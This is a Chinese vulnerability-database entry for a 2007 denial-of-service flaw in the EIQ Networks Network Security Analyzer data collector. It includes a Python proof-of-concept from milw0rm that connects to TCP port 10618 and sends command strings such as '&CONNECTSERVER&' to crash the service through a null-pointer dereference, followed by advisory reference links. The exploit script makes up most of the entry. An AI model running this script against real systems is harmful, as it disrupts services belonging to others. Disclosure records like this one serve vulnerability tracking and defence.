EIQ Networks 拒绝服务漏洞

https://www.exploit-db.com/exploits/3112
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200701-170

EIQNetworks网络安全分析器中的数据搜集器服务器远程攻击者可以借助一个发送到TCP端口10618的(1)&CONNECTSERVER&(2)&ADDENTRY&(3)&FIN&(4)&START&(5)&LOGPATH&(6)&FWADELTA&(7)&FWALOG&(8)&SETSYNCHRONOUS&(9)&SETPRGFILE&或(10)&SETREPLYPORT&字符串，引起拒绝服务攻击(服务器崩溃)。这会触发空指针引用。

#!c:\python\python.exe
# uncomment whichever function youd like. theyll all crash in a similar way.

# Any of the following "function names" will cause the service to throw an access violation 
# while dereferencing the return value from a call to FindIndex 
# ( http://msdn2.microsoft.com/de-de/library/a93550bb(VS.80).aspx):

# Ethan Hunt <m34r\[@\]hackermail.com>

import socket

s = socket.socket(socket.AF_INET , socket.SOCK_STREAM)
s.connect(('192.168.1.101', 10618))

print "[*] connected"

s.send("&CONNECTSERVER&")
#s.send("&ADDENTRY&")
#s.send("&FIN&")
#s.send("&START&")
#s.send("&LOGPATH&")
#s.send("&FWADELTA&")
#s.send("&FWALOG&")
#s.send("&SETSYNCHRONOUS&")
#s.send("&SETPRGFILE&")
#s.send("&SETREPLYPORT&")

print "disconnecting."

s.close()

# milw0rm.com [2007-01-10]

来源:BID
名称:21994
链接:http://www.securityfocus.com/bid/21994
来源:OSVDB
名称:32725
链接:http://osvdb.org/32725
来源:FULLDISC
名称:20070110EIQNetworksNetworkSecurityAnalyzerDoSVulnerability
链接:http://archives.neohapsis.com/archives/fulldisclosure/2007-01/0209.html
来源:XF
名称:eiq-datacollector-dos(31428)
链接:http://xforce.iss.net/xforce/xfdb/31428
来源:VUPEN
名称:ADV-2007-0147
链接:http://www.frsirt.com/english/advisories/2007/0147
来源:SECUNIA
名称:23693
链接:http://secunia.com/advisories/23693